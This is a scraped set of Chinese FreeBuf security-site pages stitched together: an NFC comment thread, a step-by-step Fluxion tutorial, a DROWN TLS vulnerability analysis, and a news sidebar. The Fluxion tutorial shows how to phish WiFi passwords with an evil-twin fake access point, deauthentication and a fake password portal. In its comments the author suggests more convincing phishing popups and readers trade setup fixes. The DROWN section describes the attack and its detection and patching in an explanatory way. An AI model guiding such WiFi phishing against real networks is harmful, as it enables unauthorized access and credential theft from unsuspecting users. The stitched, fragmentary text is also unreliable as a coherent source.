    [doge][喵喵]

    亮了(1)
  • 田瑞国?2015-10-09回复40楼

    好办法。 其它型号的NFC手机可以参考 这篇文章进行修改

    亮了(2)
  • VYSEa?2015-10-09回复41楼

    这个是NFC-A,也就是NFC TAG产品用的标准,一般就用于识别东西而已,储存不了啥加密的数据。国内有些安防设备用去年说的Mifare Classic也罢,直接用TAG当门禁。。。。

    亮了(1)
  • 悲观主义的码农?2015-10-10回复42楼

    n6和n5一样吗?

    亮了(1)
  • WPloveYU?2015-10-10回复43楼

    马克一下

    亮了(1)
  • -老光?2015-10-11回复44楼

    [喵喵][doge]

    亮了(1)
  • kentg?(1级)?2015-10-12回复45楼

    开始以为是ID卡,原来是卡ID,……

    亮了(1)
  • iEasonLiu?2015-10-14回复46楼

    一加一代成功! 有点意思 其它型号的NFC手机可以参考 这篇文章进行修改

    亮了(1)
  • 章鱼哥?(1级)?2015-10-15回复47楼

    我的华为M7和google galaxy nexus (I9250)也读取不到自己的nfc的id的,求解?用TAGINFO读取

    亮了(1)
  • 龍民?(1级)?2015-10-19回复48楼

    找不到这个文件啊 libnfc-brcm-20791b05.conf

    亮了(1)
  • 一个人奋斗中哈?2015-10-26回复49楼

    你们网站为什么登上不上去了

    亮了(1)
  • 浮生三千似流年?2015-10-27回复50楼

    我也是,得FQ才能上,昨天开始的

    亮了(1)
1 2 下一页
表情插图

取消

seudingo

这家伙太懒,还未填写个人描述!

1 篇文章3 条评论

相关阅读

  • 安全研究员是如何破解智能机指纹锁的?(含报告及演示视频)
  • NFC协议安全工具-NFCGUI发布
  • 低成本安全硬件实战遇到的那些事
  • 如何利用Nexus 5伪造一张门禁卡
  • 黑客在身体中植入NFC芯片,绕过军事安检实施入侵

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

如何破解wifi密码

如何破解wifi密码

投稿

运用Fluxion高效破解WiFi密码

ArthurKiller2016-06-21777131人围观 ,发现 87 个不明物体工具

Fluxion是一个无线破解工具,这个工具有点像是Linset的翻版。但是与Linset比较起来,它有着更多有趣的功能。目前这个工具在Kali Linux上可以完美运行。

工作原理

1.扫描能够接收到的WIFI信号

2.抓取握手包(这一步的目的是为了验证WiFi密码是否正确)

3.使用WEB接口

4.启动一个假的AP实例来模拟原本的接入点

5.然后会生成一个MDK3进程。如果普通用户已经连接到这个WiFi,也会输入WiFi密码

6.随后启动一个模拟的DNS服务器并且抓取所有的DNS请求,并且会把这些请求重新定向到一个含有恶意脚本的HOST地址

7.随后会弹出一个窗口提示用户输入正确的WiFi密码

8.用户输入的密码将和第二步抓到的握手包做比较来核实密码是否正确

9.这个程序是自动化运行的,并且能够很快的抓取到WiFi密码

使用步骤

原理说完了,那么接下来说说使用步骤吧。这个工具已经被发布在Github上,大家可以前往下载。

git clone https://github.com/deltaxflux/fluxion.git

通过以下命令开启Fluxion。

./fluxion

1.png

Fluxion开启页面

随后Fluxion会让我们选择网卡和信道。网卡的话需要大家自己分辨,但是信道选项一般都是选择第一个(全部信道)。

2.png

网卡选择

3.png

信道选择

选择完后它会对网卡周围的WiFi进行扫描,扫描到你要破解的WiFi后按Ctrl+C停止。

w.png

WiFi扫描

在这一步,我们选择自己想要破解的网络。如果我要破解列表内的第二个网络,那么就输入2。

5.png

选择要破解的网络

然后选择第一个选项建立一个虚假的AP。

6.png

选择攻击方式

这里会碰到一个选项叫你选择握手包的保存路径。你可以直接空格键跳过,这样握手包会默认保存在/root/Desktop/路径下。随后选择1,其目的是选择aircrack-ng开始抓取握手包。

7.png

握手包保存路径选项

8.png

握手包抓取选项

随后再选择1,这样会使目标WiFi的用户进行统一的一个分配。

9.png

数据包分配

上一个步骤结束之后它会自动打开两个新的终端控制窗口。一个窗口主要是抓取WPA数据包的,而另外一个窗口是分配数据包的。然后我们在原来的窗口上选择1让它继续抓包。

10.png

新打开的两个窗口

抓完包后它会询问你选择一个WEB接口,这里我们选择1。

11.png

WBE接口选择

然后它会叫我们选择语言。这里我看了一下没中文版,大家自己看源码改改了。

12.png

语言选项

选择完语言后它会开启新的四个控制窗口,并且建立虚假的AP,用户分配等操作。

13.png

新开启的四个窗口

这时只要用户打开浏览器,就会转到输入WiFi密码的页面。

14.png

虚假的WiFi密码输入窗口

只要用户输入正确的WiFi密码,整个程序就会停止运行,并且会自动弹出正确的WiFi密码。

15.png

正确的WiFi密码

总结

突然想起在4年前还拿着BT Linux来跑pin码破解WiFi,经常一跑就是一个晚上。还是社工破解WiFi更加靠谱。

本文作者:ArthurKiller,编译自Rajhackingarticles,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

这些评论亮了

  • cangtianyx(1级)回复
    思路很不错,就是那个网页验证得有点假。
    )18(亮了
  • 麻花疼回复
    你确定是破解不是钓鱼?
    )13(亮了
  • taylorwin(5级)回复
    @ ArthurKiller? 同样的SSID 密码不一样的话,电脑的话提示密码错误,手机的话提示验证错误。模拟的AP应该是没有密码的吧,手机和电脑记住上一次的SSID的情况下,全一直用记录的密码去连,这样还是需要用户干预近来。晚上还是自己试一下。
    )11(亮了
  • anonymous回复
    @ ArthurKiller? 基本kail都是装在虚拟机中的,没有外置usb网卡的话,没法弄 。没错吧!
    )10(亮了
  • 来盘炒饼回复
    @ ArthurKiller? 嗯,思路很清真
    )9(亮了
发表评论

已有 87 条评论

  • 麻花疼?2016-06-21回复1楼

    你确定是破解不是钓鱼?

    亮了(13)
  • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-06-21回复2楼

    :mrgreen: 还想到一个牛B的思路。上面的源码只是在网页里面显示。搞得有些假,如果结合弹窗代码进行执行,效果应该很不错~

    亮了(6)
    • 来盘炒饼?2016-06-21回复

      @ ArthurKiller? 嗯,思路很清真

      亮了(9)
    • anonymous?2016-06-22回复

      @ ArthurKiller? 基本kail都是装在虚拟机中的,没有外置usb网卡的话,没法弄 。没错吧!

      亮了(10)
  • 123?2016-06-21回复3楼

    出国用正好,国内人都喜欢中文的

    亮了(7)
  • taylorwin?(5级)?2016-06-21回复4楼

    4.启动一个假的AP实例来模拟原本的接入点 大牛解释一下别,模拟原来的AP情况下,用户那里会提示保存的AP信息不对的,用户会主动忘记在连接?

    亮了(7)
    • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-06-21回复

      @ taylorwin? SSID :mrgreen:

      亮了(5)
      • taylorwin?(5级)?2016-06-21回复

        @ ArthurKiller? 同样的SSID 密码不一样的话,电脑的话提示密码错误,手机的话提示验证错误。模拟的AP应该是没有密码的吧,手机和电脑记住上一次的SSID的情况下,全一直用记录的密码去连,这样还是需要用户干预近来。晚上还是自己试一下。

        亮了(11)
      • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-06-21回复

        @ taylorwin? 抓取到的握手包就是用来做密码验证的,但是还是自己操作一遍比较好~

        亮了(6)
    • Kyrios?2016-06-21回复

      @ taylorwin? 可以把已经连上的人踢掉的

      亮了(6)
    • 偷拍谁最强~?2016-06-21回复

      @ taylorwin? 哈哈,我前几天测试时候遇到和层主一样的问题。要让用户主动忘记再连接很难,只会导致他们一直连不上。

      上面几楼的明显都是没自己测过的,ArthurKiller 你居然还让别人操作一遍??你自己真有弄一遍??弄了居然不明白层主在说什么。

      亮了(5)
      • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-06-22回复

        @ 偷拍谁最强~ :arrow: 这个工具我真没操纵过,但是看着文档也没多复杂,所以就编译给大家了。看着大家疑问好多。。。等我的专题写完我来亲自弄一遍吧。

        亮了(7)
      • taylorwin?(5级)?2016-06-22回复

        @ 偷拍谁最强~ 我测试也是,在手机和电脑上都是显示两个一样的AP,一个是有密码(有密码的时不时被攻击下线),一个是没密码,有点安全意识的就不连没有密码的了。

        亮了(7)
      • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-06-23回复

        @ 偷拍谁最强~

        已经测试过一遍。它会生成一个相同的SSID,并且在生成的时候我的手机上连接的wifi掉线了。。。掉线了。。。这样我又得重新连接一下。因为是基于html的代码来进行钓鱼,那么可以搞一个弹窗的代码来模拟IOS端的wifi输入的窗口。

        亮了(6)
      • 爱捣蛋的鬼?(2级)?2016-07-06回复

        @ ArthurKiller? 搞个IOS那个输入wifi密码的倒是不错,哈哈哈

        亮了(1)
      • 偷拍谁最强~?2016-07-18回复

        @ ArthurKiller? 是啊,坑就在这里,mdk3让他掉线,手机会自动再查找匹配的ssid再连接,会不停重复这个动作。这里只能期待被钓者自己主动点忘记网络再连上来,他不忘记,永远是死循环。

        亮了(4)
      • HLPHLG?(1级)?2016-07-18回复

        @ ArthurKiller? 为什么 我的 生成的时候没有反应呢,也没掉线啊,让用户主动取消保存 太难了

        亮了(1)
  • AI吃葡萄干?2016-06-21回复5楼

    有点意思,收藏了

    亮了(7)
  • cangtianyx?(1级)?2016-06-21回复6楼

    思路很不错,就是那个网页验证得有点假。

    亮了(18)
    • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-06-21回复

      @ cangtianyx? 对的。。骗骗小白还行。所以我就想着弄一个弹窗的效果要好很多,登陆网页后自动弹窗。 :mrgreen:

      亮了(5)
  • 咖啡男Stephen_Liu?2016-06-21回复7楼
    亮了(6)
  • 蛤_搞个大新闻?2016-06-21回复8楼

    提供了一个新思路,不过 细节还是要优化一下,目前还是很容易被识破的

    作为应对措施,家里的WiFi密码只有我一个人知道

    亮了(7)
    • 偷拍谁最强~?2016-06-21回复

      @ 蛤_搞个大新闻 可以看看模板里面有个 固件升级 模板,用那个模板很不容易被识破,很多人后台密码和wifi密码相同,这个程序还带输入后自动验证,错误还让他再输,一般人都会试完普通密码不对再试wifi密码(会以为自己忘记了,多试几个)。试到wifi密码时验证成功过,等待固件升级完成读条。

      亮了(5)
  • Reader?2016-06-21回复9楼

    如果攻击者不知道PSK也可以随便开钓鱼热点,那还要WiFi密码干什么……直接强迫对方连上自己不就可以干坏事了?

    亮了(5)
  • anonymous?2016-06-21回复10楼

    无论如何,思路很赞。

    亮了(5)
  • 亢宇飞的微波?(1级)?2016-06-21回复11楼

    这是钓鱼,不过思路很赞

    亮了(4)
  • cwg2552298?(6级)Follow my own course?2016-06-21回复12楼

    :idea: thanks for sharing

    亮了(2)
  • Linger?(2级)?2016-06-21回复13楼

    呃,这也就骗骗小白吧

    亮了(2)
  • Shine苗苗?2016-06-22回复14楼

    走哪再不用向人家要密码啦[挖鼻][挖鼻]

    亮了(2)
  • ysc3839?(1级)?2016-06-22回复15楼

    我以前怎么听说伪造的热点输入任何密码都能连上,然后你这边会显示出用户输入的密码?

    亮了(2)
  • will?2016-06-22回复16楼

    为什么运行 ./fluxion 的时候会提示:

    进入目录后再运行 ./fluxion 显示

    亮了(2)
    • 冰海?(3级)我思故我在……?2016-06-22回复

      @ will 安装一下需要的组件就行了
      apt-get install xxx

      亮了(2)
      • 阿伟?2016-07-29回复

        @ 冰海? 如何安装组件

        亮了(1)
    • 0.0?2016-06-23回复

      @ will 你先运行那个目录下的install.sh.也可以自己安装

      亮了(2)
    • mut0uren?(1级)?2016-06-28回复

      @ will 你这个是怎么解决的我的也是这样啊

      亮了(2)
      • Carter?2016-07-30回复

        @ mut0uren? 定位到目录./fluxion然后在执行该命令啊

        亮了(1)
  • dosmlp?2016-06-22回复17楼

    实测没什么用,用户那里保存的是带密码的ssid,是不会连上这个模拟出来的不带密码的热点,会提示密码错误或验证失败之类的问题,除非你能让用户主动删掉原来那个保存的热点

    亮了(5)
    • deltax_credits?(1级)?2016-06-22回复

      @ dosmlp 那教程中是如何做到破解处密码的呢?

      亮了(1)
      • dosmlp?2016-06-23回复

        @ deltax_credits? 教程中作者为了能破解密码主动删除原来的热点然后重新连上了这个模拟出来的无密码热点,我只能这么推测

        亮了(3)
    • 涵哥的微笑?(1级)?2016-06-23回复

      @ dosmlp 两个同样的ssid会导致不能上网。不信你可以试试把手机热点和无线路由的ssid改成一样的。你会发现不能上网。

      亮了(3)
      • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-06-24回复

        @ 涵哥的微笑? 对的。。。。和我实际测试效果中一样

        亮了(1)
  • 哈哈哈哈哈哈?2016-06-22回复18楼

    然而我关心的是那个字体kali2自带那个字体终端上鸟文会重叠,很难看……

    亮了(2)
  • ZhouNianCheng??(1级)?2016-06-22回复19楼

    我表示 看完这个后,我觉得需要两张网卡才对,一张做攻击实行MDK3 一张做钓鱼… 还是实体机吧…

    亮了(2)
    • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-06-24回复

      @ ZhouNianCheng?? 不用,一张网卡就行

      亮了(2)
      • flyflying?(1级)?2016-06-28回复

        @ ArthurKiller? 我运行总是提醒 there isnt wareless cards ,没用网卡,可我的虚拟机里已经桥接到了主机网卡了,是不是必须使用外置网卡钓鱼,求推荐什么牌子的网卡好

        亮了(2)
      • fff?2016-06-29回复

        @ flyflying? 虚拟机要用USB无线网卡才行

        亮了(2)
      • flyflying?(1级)?2016-06-29回复

        @ fff 已经买了8187的

        亮了(2)
      • mut0uren?(1级)?2016-06-29回复

        @ ArthurKiller?

        这几个 Not installed 怎么破de

        亮了(3)
      • Carter?2016-07-30回复

        @ mut0uren? 输入命令apt-get install XXX。 把XXX替换成没被安装的(就是Not installed的)名称 比如说apt-get install php5-cgi

        亮了(1)
      • Illusionists?(1级)?2016-08-28回复

        apt update
        apt install isc-dhcp-server hostapd lighttpd php-cgi

        注意是要装php-cgi不是php5-cgi 装后者还是错误

        亮了(0)
      • Illusionists?(1级)?2016-08-28回复

        @ mut0uren

        亮了(0)
  • zeal0us?2016-06-22回复20楼

    Mark

    亮了(2)
  • jsjsh9?2016-06-22回复21楼

    这种工具都半斤八两

    亮了(2)
  • deltax_credits?(1级)?2016-06-22回复22楼

    实测了一下,效果不理想

    亮了(2)
    • flyflying?(1级)?2016-06-28回复

      @ deltax_credits? 用的虚拟机测试吗,需要外置网卡吗

      亮了(2)
  • yrh?(1级)?2016-06-22回复23楼

    我记得的airodump-ng抓包的时候会显示客户端曾经连接过的其他AP,那些AP不一定都有密码吧?把伪造的ssid按个试试,说不定就有人连了?这里可以尽情社工?看看哪些SSID是他可能连接过的没密码的,或者知道密码的?目的就是让他进入我们的内网?之后网爷可以做成需要破解的ssid,光是deauth干扰后重连的几秒绝对不会惹人注意?何况这样可以让真正的路由器参与钓鱼,弥补soft AP信号太差的问题

    亮了(4)
  • 小柏?(1级)?2016-06-22回复24楼

    mark

    亮了(1)
  • 30782754?(2级)?2016-06-23回复25楼

    这思路有点厉害。。

    亮了(1)
  • hello肉丝?2016-06-23回复26楼

    6666

    亮了(1)
  • 涵哥的微笑?(1级)?2016-06-23回复27楼

    一直处于这个状态

    亮了(2)
    • ArthurKiller?(7级)窃.格瓦拉驻FreeBuf办事处?2016-06-24回复

      @ 涵哥的微笑? 重新抓包吧,上面都提示说找不到握手包了

      亮了(1)
  • 打球特罗夫斯基?2016-06-23回复28楼

    你也不怕你邻居 拿着手机 到你家来要密码

    亮了(1)
  • admin?2016-06-23回复29楼

    @ anonymous 是啊,感觉好尴尬

    亮了(1)
  • ge?2016-06-24回复30楼

    感谢分享此文

    亮了(1)
  • 死宅10086?(6级)?2016-06-24回复31楼

    瞧瞧瞧瞧。。

    亮了(1)
  • 酒醉的汤姆?(1级)?2016-06-24回复32楼

    一直处于这个状态,手机打开浏览器也没有任何反应,网页无法打开。。。。

    亮了(3)
    • Illusionists?(1级)?2016-08-28回复

      @ 酒醉的汤姆? 同问题

      亮了(0)
  • 1441916133?(3级)?2016-06-29回复33楼

    那么问题来了,请问,我周围的人都不认识英语怎么办?你上去来了个弹窗,全英文的网页劫持,你是开心了,村里人懵逼了……这啥玩意儿?

    亮了(4)
    • fff?2016-06-29回复

      @ 1441916133? 自己改网页。

      亮了(1)
    • raven?(1级)?2016-10-07回复

      @ 1441916133? 村儿里人表示看不懂,直接重启了哈哈

      亮了(0)
  • flyflying?(1级)?2016-07-01回复34楼

    今天测试了,手机电脑只是显示同名的两个WiFi,电脑自动标记为2,手机标记为default,自动连接就不说了,手动连接都连不上,没效果啊

    亮了(3)
  • 杨黎彬?2016-07-01回复35楼

    收藏了

    亮了(1)
  • Carter?2016-07-31回复36楼

    到了建立虚假AP,也就是4个窗口的时候,一直没反应。怎么破

    亮了(1)
    • rainto?(1级)?2016-08-19回复

      @ Carter 你建立了虚假ap之后手机能连上这个ap吗?

      亮了(1)
      • 565882167?(1级)?2016-08-29回复

        @ rainto? 我AP都看不见- –

        亮了(1)
  • rainto?(1级)?2016-08-19回复37楼

    ap建立之后,连不上 ,所以没有client 怎么dns欺骗呢,这时候访问网站都是用的数据流量吧。

    亮了(2)
  • 565882167?(1级)?2016-08-29回复38楼

    为什么我建立不了伪AP 所有窗口都打开了

    亮了(2)
    • John?2016-10-04回复

      @ 565882167? 和你一样,无法建立AP

      亮了(0)
  • Alfredliu?2017-02-09回复39楼

    求解

    亮了(0)
  • Alfredliu?2017-02-09回复40楼

    The script should be exected inside a X (graphical) session
    求解

    亮了(0)
  • 夜半三棵树?2017-02-15回复41楼

    很尴尬的问题是别人根本不连接你的虚假AP。自己测试时,手动点击连上了,获取密码也成功了。可是实际上等了20多分钟还是只有自己的连接。

    亮了(0)
  • test?2017-03-17回复42楼

    失效了 能更新一下吗?

    亮了(0)
  • heikeyujike?2017-05-08回复43楼

    有人知道这是什么原因吗?有点急想要搞清楚,如有谁能回答一下,在这里先谢谢了!

    亮了(0)
    • RUN先生?(1级)?2017-05-08回复

      @ heikeyujike 更新一下kali源之后 试试

      亮了(0)
    • 111?2017-05-15回复

      apt update
      apt install xxxx 缺啥补啥

      亮了(0)
  • 111?2017-05-15回复44楼

    我的版本是fluxion 2的,界面选项稍稍不一样,然后创建的伪装AP 名字自动为 Default(不会和攻击路由器一样的名字 手机电脑都是识别为Default) ,手机也不会自动链接,只会链接自己路由器正常的那个,就根本达不到劫持效果,我很困惑,为什么 链接不上 伪装AP

    亮了(0)
    • 111?2017-05-15回复

      @ 111 坐等回复,有没有人解决了?

      亮了(0)
表情插图

取消

ArthurKiller

ArthurKiller

窃.格瓦拉驻FreeBuf办事处

58 篇文章343 条评论

相关阅读

  • libnmap – Nmap的Python第三方库
  • Firefox/Chrome渗透测试插件推荐
  • Windows主机IDS—Patriot NG 2.01
  • 全能型反汇编引擎 – Capstone-Engine
  • Nmap –script 命令帮助手册

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

drown

drown

投稿

Drown跨协议攻击TLS漏洞分析

百度云安全2016-03-07195510人围观 ,发现 5 个不明物体漏洞

北京时间 2016年3月2日,OpenSSL官方发布了新的安全公告。公告中提及修复了一个高危漏洞——DROWN跨协议攻击TLS漏洞。百度云安全威胁管理团队联合百度安全应急响应中心第一时间对事件触发应急响应和全网感知,深度分析了漏洞的危害和影响范围。

经分析,攻击者利用该漏洞可突破目前广泛使用的依赖SSL和TLS安全加密体系,互联网中有大约1100万站点或者服务受到此漏洞影响。

一、Drown跨协议攻击TLS漏洞分析

1. 漏洞危害

攻击者通过中间人攻击等手段截获和解密用户和服务器之间的加密通信,包括但不限于用户名和密码、信用卡号、电子邮件、即时消息,以及敏感文件。在一些常见的场景,攻击者还可以冒充一个安全的网站拦截或篡改用户看到的内容。

2. 攻击原理

DROWN漏洞主要利用SSLv2协议的脆弱性对TLS协议进行攻击。

SSLv2协议是90年代推出的安全协议,由于存在大量的安全问题,被后来的TLS协议给替代。目前主流的浏览器等客户端已经禁用了SSLv2协议。OpenSSL官方在2010年的0.9.8n和1.0.0的版本中也移除了对SSLv2的支持。但是在OpenSSL的服务端的实现并没有严格遵守官方的标准,若配置不当依然可以强制使用Export?加密套件(包括密钥交换,加密算法,HMAC等的组合),附?SSLv2?加密套件(22,24为对外出口的弱加密方式,只有40位加密强度)

North American Edition (U.S. and Canada)

Short name Long name Description
27 SSL_DES_192_EDE3_CBC_WITH_MD5 Triple-DES (168 bit)
21 SSL_RC4_128_WITH_MD5 RC4 (128 bit)
23 SSL_RC2_CBC_128_CBC_WITH_MD5 RC2 (128 bit)
26 SSL_DES_64_CBC_WITH_MD5 DES (56 bit)
22 SSL_RC4_128_EXPORT40_WITH_MD5 RC4 (40 bit)
24 SSL_RC2_CBC_128_CBC_EXPORT40_WITH_MD5 RC2 (40 bit)

SSLv2协议存在的以下特性,使其非常容易受到Padding Oracle的攻击。

1)支持SSLv2协议的服务器在收到一个ClientMasterKey消息时,会立即发送ServerVerify确认信息,不校验客户端是否明文。

2)使用Export 40位加密时,master_key中只有5个字节以RSA加密

master_key?= mkclear||mksecret,攻击者可通过服务端返回的server_write_key(session?keys)解密ServerVerify中部分消息,如果解密成功,则是明文,不成功则是随机填充的队列。

3)重放相同的RSA密文请求时,根据判断解密的值是否相同知道上一次是否解密成功。

32DF2110-D931-4358-8F57-0E3A8FBBA7DD

 

整理以上思路,总结出一个大致的攻击流程:

1)攻击者使用中间人攻击手段获取1000左右 TLS的握手包

2)攻击者根据特性讲ClientKeyExcchange生成大量的PKCS#1 v1.5加密的ClientMasterKey消息,向服务端不断发起SSLv2 Export_40的连接,最终生成一个有效的SSLv2 RSA密文。

3)利用padding oracle的攻击方式解密密文。

4)攻击者SSLv2 RSA明文 转换成TLS的明文,再进行其他恶意行为

3.检测方式

通过原理可以知道,只要服务端支持SSLv2?弱强度加密组件就容易受到影响。

可通过发起SSLv2 的连接包,从返回的banner里面判断是否支持

SSL_RC2_CBC_128_CBC_EXPORT40_WITH_MD5

SSL_RC4_128_EXPORT40_WITH_MD5

SSL_DES_64_CBC_WITH_MD5

等弱强度算法

  • 在线检测

https://test.drownattack.com/?site=www.yahoo.com

  • 使用nmap 检测

nmap -p 443 —script=sslv2?www.yahoo.com

如下表示存在

PORT??? STATE SERVICE
443/tcp open? https
| sslv2:
|?? SSLv2 supported
|?? ciphers:
|???? SSL2_DES_192_EDE3_CBC_WITH_MD5
|???? SSL2_IDEA_128_CBC_WITH_MD5
|???? SSL2_RC2_CBC_128_CBC_WITH_MD5
|???? SSL2_RC4_128_WITH_MD5
|???? SSL2_DES_64_CBC_WITH_MD5
|???? SSL2_RC2_CBC_128_CBC_WITH_MD5

|_??? SSL2_RC4_128_EXPORT40_WITH_MD5
  • 附其他检测脚本

https://github.com/nimia/public_drown_scanner/blob/master/scanner.py

二、 Drown跨协议漏洞影响面分析

1. 全球影响面

从百度掌握的大数据来看,初步估计受影响的主机达500万,其中全球以美国、欧洲受影响最大,中国也有十余万主机面临威胁

国际

2. 国内影响面

单独从国内来看,北上广为重灾区,占全国受影响主机3成以上:

PastedGraphic-14

D

三、Drown跨协议漏洞处理建议

可见国内情况也不乐观,建议大家及时升级openssl,并禁用sslv2版本协议。

  • 在CentOS、Redhat系统,可以通过如下命令升级:
# yum update openssl
  • ubuntu等版本可以通过如下命令升级:
# apt-get upgrade openssl
  • 通过如下配置禁用apache的SSLv2:

SSLProtocol all -SSLv2

  • 通过如下配置限制nginx中只使用TLS协议:
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

(文章作者:百度云安全威胁管理团队)

文章链接:http://blog.baidu.com/archives/243

这些评论亮了

  • 笑话大王回复
    给大家讲个笑话:百度做安全
    )8(亮了
  • taylorwin(5级)回复
    现在CDN漫天飞,都直接干CDN了,特别是那些不知名CDN。
    )7(亮了
  • wdlth回复
    Vulnerable Domains:
    955**.com
    *.955**.com
    union***.com
    *.union***.com
    union***secure.com
    *.union***secure.com
    *.ac.100**.cn
    tong**.com
    *.tong**.com
    *.cool***.com
    qb**.me
    *.qb**.me
    某CDN看来要火了
    )6(亮了
发表评论

已有 5 条评论

  • kg chen?2016-03-07回复1楼

    感谢翻译~

    亮了(3)
  • taylorwin?(5级)?2016-03-07回复2楼

    现在CDN漫天飞,都直接干CDN了,特别是那些不知名CDN。

    亮了(7)
  • 笑话大王?2016-03-07回复3楼

    给大家讲个笑话:百度做安全

    亮了(8)
  • wdlth?2016-03-07回复4楼

    Vulnerable Domains:
    955**.com
    *.955**.com
    union***.com
    *.union***.com
    union***secure.com
    *.union***secure.com
    *.ac.100**.cn
    tong**.com
    *.tong**.com
    *.cool***.com
    qb**.me
    *.qb**.me

    某CDN看来要火了

    亮了(6)
  • cwg2552298?(6级)Follow my own course?2016-03-08回复5楼

    sslstrip -l 10000 :mrgreen:

    亮了(4)
表情插图

取消

百度云安全

百度云安全

百度云安全部官方

13 篇文章0 条评论

相关阅读

  • 安全科普:HTTPS初探
  • CVE-2014-0160 Heartbleed分析报告
  • 利用背景流量数据(contexual flow data) 识别TLS加密恶意流量
  • 安全扫描神器Nmap 7新版发布
  • 【安全预警】Forbidden attack:7万台web服务器陷入被攻击的险境

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中…

0daybank

uf

uf

投稿
Twitter曝新BUG:可以任意账号发布推文
13分钟前
卡塔尔国家新闻机构被黑,调查正在进行中
27分钟前
Asterisk通讯框架修复3个严重DoS漏洞
1天前
VMware修复Workstation的提权与DoS漏洞
1天前
欧洲刑警组织逮捕27人,这些人在欧洲多国进行ATM“黑盒”攻击
1天前
卡巴斯基:WannaCry感染最多的操作系统是Windows 7,而XP几乎可忽略不计
1天前
Netgear路由器新固件会收集用户数据?好在可以关闭
1天前
HTTPS钓鱼站点越来越多
2天前
纽约时报:中国从2010年起就已经在挫败CIA的各种间谍行动,间谍网络持续折戟
2天前
国外安全研究人员开发出一款针对WannaCry的文件恢复工具,但恢复依然要“靠运气”
2天前
Loading…

关注FreeBuf微信公众号
每日精选文章推送

新浪微博

如何高效利用你所“劫持”的HTTP会话?WEB安全
如何高效利用你所“劫持”的HTTP会话?
addadd2017-05-24?
HTTP是无状态的协议,为了维持和跟踪用户的状态,引入了Cookie和Session,所以说拿到了cookie,就可以获得victim的登录状态,也就达到了会话劫持的效果。
WEB安全已有 2594 人围观 ,发现 1 个不明物体
具有ID欺骗功能的NFS客户端 - NfSpy工具
具有ID欺骗功能的NFS客户端 – NfSpy
Alpha_h4ck2017-05-24
本文接受啊了具有ID欺骗功能的NFS客户端 – NfSpy
工具已有 3286 人围观
朝鲜的网络作战能力究竟如何?来看路透社对朝Unit 180部队的解读资讯
朝鲜的网络作战能力究竟如何?来看路透社对朝Unit 180部队的解读
secist2017-05-24
这是朝鲜主要间谍机构下属,一个被称之为Unit 180的特殊部队。
资讯已有 10642 人围观 ,发现 1 个不明物体
最新SMB僵尸网络利用了7个NSA工具,而WannaCry只用了两个……资讯
最新SMB僵尸网络利用了7个NSA工具,而WannaCry只用了两个……
米雪儿2017-05-24
一种新的蠕虫正在通过SMB传播,这种病毒使用了7种NSA工具,而WannaCry仅使用了两种……
资讯已有 19375 人围观 ,发现 2 个不明物体
利用micropython快速实现Badusb及手机摇控扩展工具
利用micropython快速实现Badusb及手机摇控扩展
xiaowuyi2017-05-24
本文以TPYBoard开发板为例讲解了利用micropython进行HID设备测试的主要方法,使用mt7681模块进行了一个简单的实验,实现了手机摇控键盘输入的测试。
工具无线安全已有 7090 人围观
五年前的今天,TSRC迎来了第一位白帽子周边
五年前的今天,TSRC迎来了第一位白帽子
腾讯安全平台部2017-05-23
「黑客」是大众给他们贴的标签,「白帽子」是他们真正的名字。他们到底是怎样的一群人?
周边已有 33255 人围观 ,发现 6 个不明物体
解读Wannacry背后的匿名网络专题
解读Wannacry背后的匿名网络
腾讯电脑管家2017-05-23
本文将会深挖Wannacry勒索软件背后的匿名网络,从网络分析层面揭露该病毒的狡猾伎俩。
专题网络安全已有 41681 人围观 ,发现 6 个不明物体
PinDemonium通用动态脱壳工具工具
PinDemonium通用动态脱壳工具
Lolopop2017-05-23
本文是对16年的blackhat大会上PinDemonium通用动态脱壳工具介绍。
工具已有 31300 人围观
构建一个高交互型的难以发现的蜜罐工具
构建一个高交互型的难以发现的蜜罐
secist2017-05-23
本文我将手把手的带大家来,构建一个高交互型的蜜罐。我们将会利用到两款开源工具sysdig和falco,来帮助我们快速构建这个系统。
工具系统安全已有 37754 人围观 ,发现 1 个不明物体
SMB漏洞引发的“血案”,远不止WannaCry专题
SMB漏洞引发的“血案”,远不止WannaCry
AngelaY2017-05-23
以下是安全研究人员近期发现的利用SMB漏洞发起的攻击,有些发生在WannaCry之前,有些发生在WannaCry之后。
专题资讯已有 49701 人围观 ,发现 3 个不明物体
阿里安全情报团队广纳贤才招聘
阿里安全情报团队广纳贤才
阿里安全2017-05-23
阿里安全-黑产技术攻防情报团队一直在探索情报在企业的体系化落地应用及情报的价值体现
招聘已有 59435 人围观 ,发现 13 个不明物体
国产指纹库平台 - 天蝎指纹库工具
国产指纹库平台 – 天蝎指纹库
破晓2017-05-23
信息收集为渗透测试环节一个非常重要的阶段,它关系到后序列策划攻击的成功性。快速收集目标服务信息则需要测试人员熟练运用指纹识别技术。
